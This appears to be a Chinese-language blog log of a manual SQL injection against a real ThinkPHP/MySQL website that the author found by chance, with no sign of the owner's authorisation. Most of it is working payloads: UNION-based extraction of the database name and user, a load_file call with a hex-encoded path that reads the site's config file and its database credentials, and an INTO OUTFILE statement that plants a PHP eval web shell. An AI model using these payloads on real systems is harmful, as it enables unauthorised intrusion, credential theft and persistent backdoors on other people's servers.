目录[ Hide ]
  1. 0x01:前言
  2. 0x02:辨别伪静态
  3. 0x03:快乐手注
  4. 0x03:先放着吧,过几天再搞,心累

0x01:前言

偶然得到一个站,顺便练习一下手注,记录一下过程

0x02:辨别伪静态

网站url结构:

是不是类似index.php?pid=2,感觉有猫腻的话就顺手试一下。

改变url为

发现未屏蔽报错,且暴露了部分信息

可以得出数据库为mysql,且网站框架为tp,基本可以确定是伪静态了,这就意味着/index/pid/2.html等同于/index?pid=2.

0x03:快乐手注

先fuzz一下有没有被waf的关键字,很快乐,一个都没被waf掉

开始注入:

1、payload:index?pid=2'and '1' = '1,网页正常。

2、payload:index?pid=2'and '1' = '2,网页报错。确定注入点存在且为字符型注入。

3、猜字段:payload: index?pid=2')order by 1 -- +,网页未报错。

payload: index?pid=2')order by 2 -- +,网页未报错。

payload: index?pid=2')order by 3 -- +,网页未报错。

payload: index?pid=2')order by 4 -- +,网页报错。

这里顺便说一下order by 的实质意义吧:order by 实际是猜查询出的列数,而不是表实际的列数。order by本来就是指定的结果如何order,针对的就是查询结果而不是原表。所以order by猜解得到的列数还跟在后端的逻辑有关。

详细可见 https://segmentfault.com/a/1190000002655427

4、查找可显示字段:

payload: index?pid=-2')union select 1,2,3 -- +。

5、查询当前数据库:

payload: index?pid=-2')union select 1,database(),3 -- +。

6、查询当前用户权限:

payload: index?pid=-2')union select 1,user(),3 -- +。

7、 利用报错得到的路径信息,结合ThinkPHP的目录结构,依次测试可能路径。发现配置文件在此路径下。

读文件/alidata/www/Application/Common/Conf/config.php成功得到了数据库的配置文件。

payload: index?pid=-2')union select 1,load_file(0x2f616c69646174612f7777772f4170706c69636174696f6e2f436f6d6d6f6e2f436f6e662f636f6e6669672e706870),3 -- +

8、远程连接数据库:

9、写个小马儿:

select '<?php @eval($_POST[cmd])?>' into outfile '/alidata/www/Uploads/3.php';

10、连接:

GG ······

0x03:先放着吧,过几天再搞,心累